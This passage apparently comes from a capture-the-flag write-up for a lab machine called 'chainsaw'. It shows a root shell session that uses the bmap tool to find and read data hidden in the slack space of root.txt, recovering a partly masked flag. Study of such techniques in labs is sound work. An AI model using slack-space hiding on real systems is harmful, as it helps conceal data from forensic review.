dpkg-query: no path found matching pattern /sbin/bmap

root@chainsaw:~/projects/ChainsawClub# cd /root
root@chainsaw:/root# touch /tmp/0xdf
root@chainsaw:/root# bmap –mode checkslack /tmp/0xdf
/tmp/0xdf does not have slack
root@chainsaw:/root# bmap –mode checkslack root.txt
root.txt has slack
root@chainsaw:/root# bmap –mode slack root.txt
getting from block 2655304
file size was: 52
slack size: 4044
block size: 4096
68c874b7deca1b9ddXXXXXXXXXXXXXXXXXXXXXXXX

@SAKSHAM DIXIT

Related Posts

COMMENTS

Leave a Reply

Your email address will not be published. Required fields are marked *